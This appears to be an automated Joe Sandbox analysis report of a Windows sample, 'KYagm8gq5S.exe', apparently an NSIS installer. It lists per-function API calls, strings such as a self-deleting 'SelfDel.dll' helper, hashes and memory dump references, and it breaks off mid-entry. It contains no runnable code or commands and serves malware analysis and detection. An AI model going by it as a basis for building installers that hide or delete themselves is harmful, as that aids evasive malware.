Instruction ID: 87c0a3a17ad5e1939fcd37e1134105fdbaf016035d588be57f40016c0fe971d1
Opcode Fuzzy Hash: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
Instruction Fuzzy Hash: CA61D370100605AED720BF269D45F2B3AACFB85B49F40453EF951B62E2DB7C9901CB6D

Function 004030A2 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004030B3
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\KYagm8gq5S.exe,00000400), ref: 004030CF

Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\KYagm8gq5S.exe,80000000,00000003), ref: 00406048
Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KYagm8gq5S.exe,C:\Users\user\Desktop\KYagm8gq5S.exe,80000000,00000003), ref: 0040311B
GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251

Strings

Inst, xrefs: 00403187
Null, xrefs: 00403199
C:\Users\user\Desktop\KYagm8gq5S.exe, xrefs: 004030B9, 004030C8, 004030DC, 004030FC
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278
C:\Users\user\Desktop, xrefs: 004030FD, 00403102, 00403108
Error launching installer, xrefs: 004030F2
soft, xrefs: 00403190
C:\Users\user\AppData\Local\Temp\, xrefs: 004030A9

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\KYagm8gq5S.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-1859292856
Opcode ID: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
Instruction ID: 049f7c6d5ff3921a21710fe3aab5a9d19a74ce2d4ccd47fede02a431b1dffc51
Opcode Fuzzy Hash: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
Instruction Fuzzy Hash: A4519F71901204AFDF209FA5DD86BAE7EACAB45356F20817BF500B62D1CA7C9E408B5D

Function 00401794 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Del,C:\Users\user\AppData\Local\Temp\nsiFE19.tmp,?,?,00000031), ref: 004017D5
CompareFileTime.KERNEL32(-00000014,?,Del,Del,00000000,00000000,Del,C:\Users\user\AppData\Local\Temp\nsiFE19.tmp,?,?,00000031), ref: 004017FA

Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561

Part of subcall function 004055D9: lstrlenW.KERNEL32(007A0728,00000000,00798B00,74DF23A0,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
Part of subcall function 004055D9: lstrlenW.KERNEL32(0040341A,007A0728,00000000,00798B00,74DF23A0,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
Part of subcall function 004055D9: lstrcatW.KERNEL32(007A0728,0040341A,0040341A,007A0728,00000000,00798B00,74DF23A0), ref: 00405634
Part of subcall function 004055D9: SetWindowTextW.USER32(007A0728,007A0728), ref: 00405646
Part of subcall function 004055D9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
Part of subcall function 004055D9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
Part of subcall function 004055D9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694

Strings

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp, xrefs: 00401846, 00401864
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp, xrefs: 004017C3
Del, xrefs: 004017B2, 004017BB, 004017C8, 004017DA, 004017E6, 0040181C, 00401832, 00401850, 0040188C, 0040190D, 00401916, 00401920, 0040192B
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SelfDel.dll, xrefs: 0040185A, 00401876

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp$C:\Users\user\AppData\Local\Temp\nsiFE19.tmp$C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SelfDel.dll$Del
API String ID: 1941528284-759604445
Opcode ID: a2c4ba2b1575994442f4eda3782f903add88faf4951f8c682e70490475c3a32a
Instruction ID: 1e9ca80c6a5dacc7cd580e770cf15d3f22a044297d5b9cee136244b7a600bee5
Opcode Fuzzy Hash: a2c4ba2b1575994442f4eda3782f903add88faf4951f8c682e70490475c3a32a
Instruction Fuzzy Hash: C441E871400104BADF11BBB5DD85DBE3AB5EF45329B21823FF012B10E1DB3C8A91966D

Function 004032D9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403343
GetTickCount.KERNEL32 ref: 004033C7
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033F0
wsprintfW.USER32 ref: 00403403

Strings

... %d%%, xrefs: 004033FD

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
Instruction ID: eb1ee041d621481d77111d3da967b5f6536357fdff7ba477760ccc35d22143eb
Opcode Fuzzy Hash: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
Instruction Fuzzy Hash: FD515F71910219EBCF11CF65DA8469E7FA8AB00756F14417BE804BA2C1C7789B41CBAA

Function 004068D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
wsprintfW.USER32 ref: 0040692A
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040693E

Strings

UXTHEME, xrefs: 004068E1
%s%S.dll, xrefs: 00406924

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: 3d91c3bba12f32b4d8e24f08bfb099957206232b6387f0edcfac50a9fed73821
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 80F0F671501219ABDB20BB68DD0EF9B376CAB00304F10447AA546F10E0EB789B69CB98

Function 004024AF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiFE19.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 004024FA
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsiFE19.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040253A
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsiFE19.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402622

Strings

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp, xrefs: 004024EB, 004024F9, 00402510, 00402524, 0040252F

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp
API String ID: 2655323295-843063114
Opcode ID: 1f98af66c98e622ea097f2737b7b91c500bbd897f6573687ec4a0a2fb9e2066a
Instruction ID: b5124b365774ee0dd77fffeda1a995c18ababb59e8a55150708f98195cc7d2d6
Opcode Fuzzy Hash: 1f98af66c98e622ea097f2737b7b91c500bbd897f6573687ec4a0a2fb9e2066a
Instruction Fuzzy Hash: B8117231D00114BEDB01EFA59E59AAEB6B4EF54358F20443FF504B61D1C7B88E40966C

Function 00405F2B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561

Part of subcall function 00405ECE: CharNextW.USER32(?,?,007A3F50,?,00405F42,007A3F50,007A3F50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,74DF3420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405EDC
Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EE1
Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EF9

lstrlenW.KERNEL32(007A3F50,00000000,007A3F50,007A3F50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,74DF3420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405F84
GetFileAttributesW.KERNELBASE(007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,00000000,007A3F50,007A3F50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F94

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F2B
P?z, xrefs: 00405F31

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$P?z
API String ID: 3248276644-3492887852
Opcode ID: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
Instruction ID: f4f6e0775867387827aab8404002f3e8856b431f62ec50d584846b16db6dccac
Opcode Fuzzy Hash: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
Instruction Fuzzy Hash: 9BF02D36105E5319D62273365C09AAF1544CF86358709057BF852B12D5CF3C8A53CC7E

Function 00406073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406091
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040352D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819), ref: 004060AC

Strings

nsa, xrefs: 00406080
C:\Users\user\AppData\Local\Temp\, xrefs: 00406078

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-678247507
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 3a9c7f2d553a521e2ba94e631897efa79da28a954d47360b9b57a106d7dab247
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: 83F09076B40204BFEB00CF69ED05F9EB7ACEB95750F11803AED05F7180E6B099548768

Function 004015E6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405ECE: CharNextW.USER32(?,?,007A3F50,?,00405F42,007A3F50,007A3F50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,74DF3420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405EDC
Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EE1
Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EF9

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F

Part of subcall function 00405AA8: CreateDirectoryW.KERNELBASE(007AB800,?), ref: 00405AEA

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\nsiFE19.tmp,?,00000000,000000F0), ref: 00401672

Strings

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp, xrefs: 00401665

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp
API String ID: 1892508949-843063114
Opcode ID: 60c2c0ddde8b7e5a5259822198f5dfbdca4b1fe95804475fb22a6f2f1a41da81
Instruction ID: 2b03c7a92312b5a1b0d009ad41e3f6a941738229f321331d68055a18e38198b9
Opcode Fuzzy Hash: 60c2c0ddde8b7e5a5259822198f5dfbdca4b1fe95804475fb22a6f2f1a41da81
Instruction Fuzzy Hash: 4511D031504514EBCF207FA5CD056AF36A0EF04368B25493FE941B22F1D63D4A81DA5E

Function 004020FD Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402128

Part of subcall function 004055D9: lstrlenW.KERNEL32(007A0728,00000000,00798B00,74DF23A0,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
Part of subcall function 004055D9: lstrlenW.KERNEL32(0040341A,007A0728,00000000,00798B00,74DF23A0,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
Part of subcall function 004055D9: lstrcatW.KERNEL32(007A0728,0040341A,0040341A,007A0728,00000000,00798B00,74DF23A0), ref: 00405634
Part of subcall function 004055D9: SetWindowTextW.USER32(007A0728,007A0728), ref: 00405646
Part of subcall function 004055D9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
Part of subcall function 004055D9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
Part of subcall function 004055D9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402139
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 004021B6

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 297150e83417b5866f3c74e4a486ab5a4ba485464345ec717dcdc95307e67a96
Instruction ID: 73d72cb5994b484f29e4ff80cb350354ef05bb92eb19bb99874f54bc55697afd
Opcode Fuzzy Hash: 297150e83417b5866f3c74e4a486ab5a4ba485464345ec717dcdc95307e67a96
Instruction Fuzzy Hash: EF21A131904104EACF10AFA5CF89A9E7A71BF54359F30413FF105B91E5DBBD89829A2E

Function 00401BC0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalFree.KERNEL32(00995688), ref: 00401C30
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42

Strings

Del, xrefs: 00401BE7, 00401BED, 00401C07

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: Global$AllocFree
String ID: Del
API String ID: 3394109436-3562819231
Opcode ID: a35846d0fa1f5f62d1cc44f85dbd038e6f418717e16ba0fa97b0d6e40a5ea598
Instruction ID: 6559a21230efabb52023b21709d08c05de394b4458a3aca8e6f4fe2726326e98
Opcode Fuzzy Hash: a35846d0fa1f5f62d1cc44f85dbd038e6f418717e16ba0fa97b0d6e40a5ea598
Instruction Fuzzy Hash: 6A216F73904110ABDB20FBA8DEC5A5E72E4AB08324715053BE552B72D5C6BCA8819B9D

Function 00405C18 Relevance: 4.5, APIs: 3, Instructions: 28
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040601F: GetFileAttributesW.KERNELBASE(?,?,00405C24,?,?,00000000,00405DFA,?,?,?,?), ref: 00406024
Part of subcall function 0040601F: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406038

RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405DFA), ref: 00405C33
DeleteFileW.KERNELBASE(?,?,?,00000000,00405DFA), ref: 00405C3B
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C53

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
Instruction ID: f682af0fc63b023cf24323d230711a29b923368031e02a534c45a89517f952f8
Opcode Fuzzy Hash: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
Instruction Fuzzy Hash: E9E0653110D75156E32067755E0CB5B2AD9DF86324F05093AF592B21D0CB78488A8AAD

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

